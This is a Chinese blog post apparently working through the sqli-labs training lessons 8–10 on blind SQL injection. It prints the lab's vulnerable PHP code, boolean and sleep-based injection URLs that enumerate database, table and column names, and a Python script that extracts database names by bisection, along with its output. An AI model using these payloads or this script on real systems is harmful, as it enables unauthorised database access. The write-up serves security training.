<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Python,sql注入,sqli-labs," />










<meta name="description" content="Less-8 GET-Blind-Boolian Based - Single Quotes布尔型单引号GET盲注盲注当不能通过直接显示来获取数据库数据时，使用盲注的方式，根据其返回页面的不同来判断信息(页面内容不同，响应时间)；一般分为布尔型盲注，时间性盲注，报错盲注。 盲注常用函数   函数 功能     length(str) 返回str字符串的长度。   substr(str, pos,">
<meta name="keywords" content="Python,sql注入,sqli-labs">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs-Less-8-10">
<meta property="og:url" content="http://yoursite.com/2018/04/22/sqli-labs-Less-8-10/index.html">
<meta property="og:site_name" content="Ahodor&#39;Via">
<meta property="og:description" content="Less-8 GET-Blind-Boolian Based - Single Quotes布尔型单引号GET盲注盲注当不能通过直接显示来获取数据库数据时，使用盲注的方式，根据其返回页面的不同来判断信息(页面内容不同，响应时间)；一般分为布尔型盲注，时间性盲注，报错盲注。 盲注常用函数   函数 功能     length(str) 返回str字符串的长度。   substr(str, pos,">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2018-08-09T05:43:56.659Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sqli-labs-Less-8-10">
<meta name="twitter:description" content="Less-8 GET-Blind-Boolian Based - Single Quotes布尔型单引号GET盲注盲注当不能通过直接显示来获取数据库数据时，使用盲注的方式，根据其返回页面的不同来判断信息(页面内容不同，响应时间)；一般分为布尔型盲注，时间性盲注，报错盲注。 盲注常用函数   函数 功能     length(str) 返回str字符串的长度。   substr(str, pos,">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/04/22/sqli-labs-Less-8-10/"/>





  <title>sqli-labs-Less-8-10 | Ahodor'Via</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ahodor'Via</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/04/22/sqli-labs-Less-8-10/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ahodor">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ahodor'Via">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sqli-labs-Less-8-10</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-04-22T15:42:51+08:00">
                2018-04-22
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Less-8-GET-Blind-Boolian-Based-Single-Quotes"><a href="#Less-8-GET-Blind-Boolian-Based-Single-Quotes" class="headerlink" title="Less-8 GET-Blind-Boolian Based - Single Quotes"></a>Less-8 GET-Blind-Boolian Based - Single Quotes</h2><h3 id="布尔型单引号GET盲注"><a href="#布尔型单引号GET盲注" class="headerlink" title="布尔型单引号GET盲注"></a>布尔型单引号GET盲注</h3><h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><p>当不能通过直接显示来获取数据库数据时，使用盲注的方式，<strong>根据其返回页面的不同来判断信息(页面内容不同，响应时间)</strong>；一般分为<strong>布尔型盲注</strong>，<strong>时间性盲注</strong>，<strong>报错盲注</strong>。</p>
<h3 id="盲注常用函数"><a href="#盲注常用函数" class="headerlink" title="盲注常用函数"></a>盲注常用函数</h3><table>
<thead>
<tr>
<th>函数</th>
<th>功能</th>
</tr>
</thead>
<tbody>
<tr>
<td>length(str)</td>
<td>返回str字符串的长度。</td>
</tr>
<tr>
<td>substr(str, pos, len)</td>
<td>将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始</td>
</tr>
<tr>
<td>mid(str,pos,len)</td>
<td>跟上面的一样，截取字符串</td>
</tr>
<tr>
<td>ascii(str)</td>
<td>返回字符串str的最左面字符的ASCII代码值。</td>
</tr>
<tr>
<td>ord(str)</td>
<td>同上，返回ascii码</td>
</tr>
<tr>
<td>if(a,b,c)</td>
<td>a为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0</td>
</tr>
<tr>
<td>select database()</td>
<td>查询数据库</td>
</tr>
<tr>
<td>ascii(substr((select database()),1,1))</td>
<td>返回数据库名称的第一个字母,转化为ascii码</td>
</tr>
<tr>
<td>ascii(substr((select database()),1,1))&gt;64</td>
<td>ascii大于64就返回true，if就返回1，否则返回0</td>
</tr>
</tbody>
</table>
<p>常见的ASCII，A:65,Z:90 a:97,z:122, 0:48, 9:57</p>
<a id="more"></a>
<h3 id="布尔型盲注"><a href="#布尔型盲注" class="headerlink" title="布尔型盲注"></a>布尔型盲注</h3><h4 id="盲注固定式"><a href="#盲注固定式" class="headerlink" title="盲注固定式:"></a>盲注固定式:</h4><pre><code>and ascii(substr(A,1,1))&gt;B
and if(ascii(substr(A,1,1))&gt;B,1,0)
</code></pre><p>A 通过是一个select语句，B则是字符串或数字的ascii码，中心思想是通过substr等截取函数以二分法的形式逐个查询匹配想要的信息，过程耗时繁琐。</p>
<h3 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h3><h4 id="源代分析"><a href="#源代分析" class="headerlink" title="源代分析"></a>源代分析</h4><pre><code>    &lt;?php
//including the Mysql connect parameters.
include(&quot;../sql-connections/sql-connect.php&quot;);
error_reporting(0);
// take the variables
if(isset($_GET[&apos;id&apos;]))
{
$id=$_GET[&apos;id&apos;];
//logging the connection parameters to a file for analysis.
$fp=fopen(&apos;result.txt&apos;,&apos;a&apos;);
fwrite($fp,&apos;ID:&apos;.$id.&quot;\n&quot;);
fclose($fp);

// connectivity 


$sql=&quot;SELECT * FROM users WHERE id=&apos;$id&apos; LIMIT 0,1&quot;;
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
    echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;    
    echo &apos;You are in...........&apos;;
    echo &quot;&lt;br&gt;&quot;;
        echo &quot;&lt;/font&gt;&quot;;
    }
    else 
    {

    echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;
    //echo &apos;You are in...........&apos;;
    //print_r(mysql_error());
    //echo &quot;You have an error in your SQL syntax&quot;;
    echo &quot;&lt;/br&gt;&lt;/font&gt;&quot;;    
    echo &apos;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&apos;;    

    }
}
    else { echo &quot;Please input the ID as parameter with numeric value&quot;;}

?&gt;
</code></pre><p>参数<strong>id</strong>是由单引号包裹，报错显示函数被注释掉了，之前的<strong>双查询注入</strong>方法不适用</p>
<p>正确时返回</p>
<pre><code>Welcome    Dhakkan
You are in......
</code></pre><p>错误时返回</p>
<pre><code>Welcome    Dhakkan
</code></pre><h4 id="注入方法"><a href="#注入方法" class="headerlink" title="注入方法"></a>注入方法</h4><pre><code>sqli-labs/Less-8/?id=1 返回正常
sqli-labs/Less-8/?id=1&apos; 返回错误
sqli-labs/Less-8/?id=1&apos;%23 返回正常，可知是单引号闭合
猜解系统中所有的数据库名
sqli-labs/Less-8/?id=1&apos;  and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)) = 105%23 这里猜到了字母 i 
查询当前数据库名长度
sqli-labs/Less-8/?id=1&apos;  and length((select database())) =8 %23 长度为 8 
查询数据库名
sqli-labs/Less-8/?id=1&apos;  and ascii(substr((select database()),1,1)) &gt; 50 %23 返回正常
sqli-labs/Less-8/?id=1&apos;  and ascii(substr((select database()),1,1)) =115 %23 通过二分法确定了数据库名的首字母的ascii码值为115（s）
猜解security数据库中的表名
sqli-labs/Less-8/?id=1&apos;  and ascii(substr((select table_name from information_schema.tables where table_schema =&apos;security&apos; limit 1,1),1,1)) = 114 %23
猜解users表中的列名
sqli-labs/Less-8/?id=1&apos;  and ascii(substr((select column_name from information_schema.columns where table_name =&apos;users&apos; limit 1,1),1,1)) =117 %23
</code></pre><h3 id="python爆破小脚本"><a href="#python爆破小脚本" class="headerlink" title="python爆破小脚本"></a>python爆破小脚本</h3><pre><code>#!/usr/bin/python
#-*-encoding:utf-8-*-

import requests
import re

url = &apos;http://xxx.xxx.xxx.xxx/&apos;

#获取数据长度
def getDataLen(url,payload,min,max):
    num_min = min
    num_max = max
    while min &lt; max:
        num_mid = (num_min + num_max) /2
        #print num_min,num_mid,num_max
        if (num_max == num_mid) or (num_min == num_mid):
            num = num_max
            if not re.findall(r&apos;You are in&apos;,requests.get(url + payload % num_min).text):
                num = num_min
            #print &apos;find num = %d&apos; % num
            return num
        payload_new = payload % num_mid
        finalurl = url + payload_new
        #print finalurl
        r = requests.get(finalurl)
        html = r.text
        result = re.findall(r&apos;You are in&apos;,html)
        if result:
            num_min = num_mid + 1
        elif not result:
            num_max = num_mid 


#获取当前数据库名
def getCurrentDBName():
    payload_len = &apos;sqli-labs/Less-8/?id=1\&apos;and length((select database())) &gt; %d %%23 &apos;

    print &apos;获取数据库名长度&apos;
    DBNameLen = getDataLen(url,payload_len,1,50)
    print &apos;DBNameLen: %s&apos; % DBNameLen
    print &apos;获取数据库名&apos;
    payloadstart = &apos;sqli-labs/Less-8/?id=1\&apos; and ascii(substr((select database()),%d,1))&apos;
    payloadend = &apos;&gt; %s %%23&apos;
    DBName = &apos;&apos;
    for i in range(1,DBNameLen+1):
        payload1 = payloadstart % i
        payload2 = payload1 + payloadend
        ascii_s = getDataLen(url,payload2,0,128)
        DBName += chr(ascii_s)

    print &apos;DBName: %s&apos; % DBName


#获取数据库系统中所有的数据库名
def getAllDBName():
    payload_start = &apos;sqli-labs/Less-8/?id=1\&apos; and &apos;
    payload_select = &apos;select schema_name from information_schema.schemata limit %d,1&apos;
    payload_ascii1 = &apos; ascii(substr((%s)&apos;
    payload_ascii2 = &apos;,%d,1))&apos;
    payload_end = &apos;&gt; %s %%23&apos;

    DBNameLen = []
    for i in range(0,10):#此处默认系统中最多有十个数据库
        payload_selecti = payload_select % i
        payload_lengthi = &apos;length((%s))&apos; % payload_selecti
        payload_end = &apos;&gt; %s %%23&apos;
        payload = payload_start + payload_lengthi + payload_end
        #print payload
        DBNameLen.append(getDataLen(url,payload,0,50))
    print &apos;系统中各个数据库的长度&apos;
    print DBNameLen

    #DBNameLen = [18, 10, 5, 18, 8, 4, 0, 0, 0, 0]
    DBName = []
    for i in range(0,len(DBNameLen)):
        print &apos;获取第%d个数据库名&apos; % i
        payload_selecti = payload_select % i
        DBNames = &apos;&apos;
        for j in range(1,DBNameLen[i]+1):
            payload_ascii1j = payload_ascii1 % payload_selecti
            payload_ascii2j = payload_ascii2 % j
            payload = payload_start + payload_ascii1j + payload_ascii2j + payload_end
            ascii_s = getDataLen(url,payload,0,128)
            DBNames += chr(ascii_s)
        print DBNames
        DBName.append(DBNames)
    print DBName

#获取某个数据库的所有表名

#获取某个表的所有的列名

#获取某个列的所有值

if __name__ == &apos;__main__&apos;:
    getCurrentDBName()
    getAllDBName()

结果：
获取数据库名长度
DBNameLen: 8
获取数据库名
DBName: security
系统中各个数据库的长度
[18, 10, 5, 18, 8, 4, 0, 0, 0, 0]
获取第0个数据库名
information_schema
获取第1个数据库名
challenges
获取第2个数据库名
mysql
获取第3个数据库名
performance_schema
获取第4个数据库名
security
获取第5个数据库名
test
获取第6个数据库名

获取第7个数据库名

获取第8个数据库名

获取第9个数据库名

[&apos;information_schema&apos;, &apos;challenges&apos;, &apos;mysql&apos;, &apos;performance_schema&apos;, &apos;security&apos;, &apos;test&apos;, &apos;&apos;, &apos;&apos;, &apos;&apos;, &apos;&apos;]
</code></pre><p>在这里只写了爆破当前数据库名和爆破系统中所有数据库名的部分，后面的表和列的部分类似</p>
<h2 id="Less-9-GET-Time-base-Single-Quotes"><a href="#Less-9-GET-Time-base-Single-Quotes" class="headerlink" title="Less-9 GET-Time base-Single Quotes"></a>Less-9 GET-Time base-Single Quotes</h2><h3 id="时间型单引号get盲注"><a href="#时间型单引号get盲注" class="headerlink" title="时间型单引号get盲注"></a>时间型单引号get盲注</h3><p>时间型和布尔型的区别在于：时间型无论输入是否合法，返回的页面是相同的，查看源代码确实如此：</p>
<pre><code>    &lt;?php
//including the Mysql connect parameters.
include(&quot;../sql-connections/sql-connect.php&quot;);
error_reporting(0);

// take the variables
if(isset($_GET[&apos;id&apos;]))
{
$id=$_GET[&apos;id&apos;];
//logging the connection parameters to a file for analysis.
$fp=fopen(&apos;result.txt&apos;,&apos;a&apos;);
fwrite($fp,&apos;ID:&apos;.$id.&quot;\n&quot;);
fclose($fp);

// connectivity 


$sql=&quot;SELECT * FROM users WHERE id=&apos;$id&apos; LIMIT 0,1&quot;;
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
    echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;    
    echo &apos;You are in...........&apos;;
    echo &quot;&lt;br&gt;&quot;;
        echo &quot;&lt;/font&gt;&quot;;
    }
    else 
    {

    echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;
    echo &apos;You are in...........&apos;;
    //print_r(mysql_error());
    //echo &quot;You have an error in your SQL syntax&quot;;
    echo &quot;&lt;/br&gt;&lt;/font&gt;&quot;;    
    echo &apos;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&apos;;    

    }
}
    else { echo &quot;Please input the ID as parameter with numeric value&quot;;}

?&gt;
</code></pre><p>时间型盲注</p>
<table>
<thead>
<tr>
<th>函数</th>
<th>作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>sleep()</td>
<td>延时执行，MySQL 5</td>
</tr>
<tr>
<td>benchmark()</td>
<td>延时执行，MySQL 4/5</td>
</tr>
</tbody>
</table>
<h4 id="判断是否为时间型盲注"><a href="#判断是否为时间型盲注" class="headerlink" title="判断是否为时间型盲注"></a>判断是否为时间型盲注</h4><pre><code>sqli-labs/Less-9/?id=1&apos; and sleep(5) %23
或
sqli-labs/Less-9/?id=1&apos; and if(1=1,sleep(5),null) %23 
</code></pre><p>执行后延迟了大概5秒左右才返回，可进行时间型盲注</p>
<h3 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h3><pre><code>猜解当前数据库
sqli-labs/Less-9/?id=1&apos; and if(ascii(substr(database(),1,1))=115, 0,sleep(5))
</code></pre><p>剩下的payload构造与Less-8类似</p>
<h2 id="Less-10-GET-Time-based-double-quotes"><a href="#Less-10-GET-Time-based-double-quotes" class="headerlink" title="Less-10 GET-Time based - double quotes"></a>Less-10 GET-Time based - double quotes</h2><h3 id="时间型双引号get盲注"><a href="#时间型双引号get盲注" class="headerlink" title="时间型双引号get盲注"></a>时间型双引号get盲注</h3><p>这里只要把Less-9的单引号改为双引号即可</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Python/" rel="tag"># Python</a>
          
            <a href="/tags/sql注入/" rel="tag"># sql注入</a>
          
            <a href="/tags/sqli-labs/" rel="tag"># sqli-labs</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/04/20/sqli-labs-Less-5-6/" rel="next" title="sqli-labs-Less-5-7">
                <i class="fa fa-chevron-left"></i> sqli-labs-Less-5-7
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/04/23/sqli-labs-Less-11-16/" rel="prev" title="sqli-labs-Less-11-16">
                sqli-labs-Less-11-16 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Ahodor</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-8-GET-Blind-Boolian-Based-Single-Quotes"><span class="nav-number">1.</span> <span class="nav-text">Less-8 GET-Blind-Boolian Based - Single Quotes</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#布尔型单引号GET盲注"><span class="nav-number">1.1.</span> <span class="nav-text">布尔型单引号GET盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注"><span class="nav-number">1.2.</span> <span class="nav-text">盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注常用函数"><span class="nav-number">1.3.</span> <span class="nav-text">盲注常用函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#布尔型盲注"><span class="nav-number">1.4.</span> <span class="nav-text">布尔型盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#盲注固定式"><span class="nav-number">1.4.1.</span> <span class="nav-text">盲注固定式:</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#payload"><span class="nav-number">1.5.</span> <span class="nav-text">payload</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#源代分析"><span class="nav-number">1.5.1.</span> <span class="nav-text">源代分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#注入方法"><span class="nav-number">1.5.2.</span> <span class="nav-text">注入方法</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python爆破小脚本"><span class="nav-number">1.6.</span> <span class="nav-text">python爆破小脚本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-9-GET-Time-base-Single-Quotes"><span class="nav-number">2.</span> <span class="nav-text">Less-9 GET-Time base-Single Quotes</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#时间型单引号get盲注"><span class="nav-number">2.1.</span> <span class="nav-text">时间型单引号get盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#判断是否为时间型盲注"><span class="nav-number">2.1.1.</span> <span class="nav-text">判断是否为时间型盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#payload-1"><span class="nav-number">2.2.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-10-GET-Time-based-double-quotes"><span class="nav-number">3.</span> <span class="nav-text">Less-10 GET-Time based - double quotes</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#时间型双引号get盲注"><span class="nav-number">3.1.</span> <span class="nav-text">时间型双引号get盲注</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        
<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ahodor</span>

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>




  <span class="post-meta-divider">|</span>




  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>
-->

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>





        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
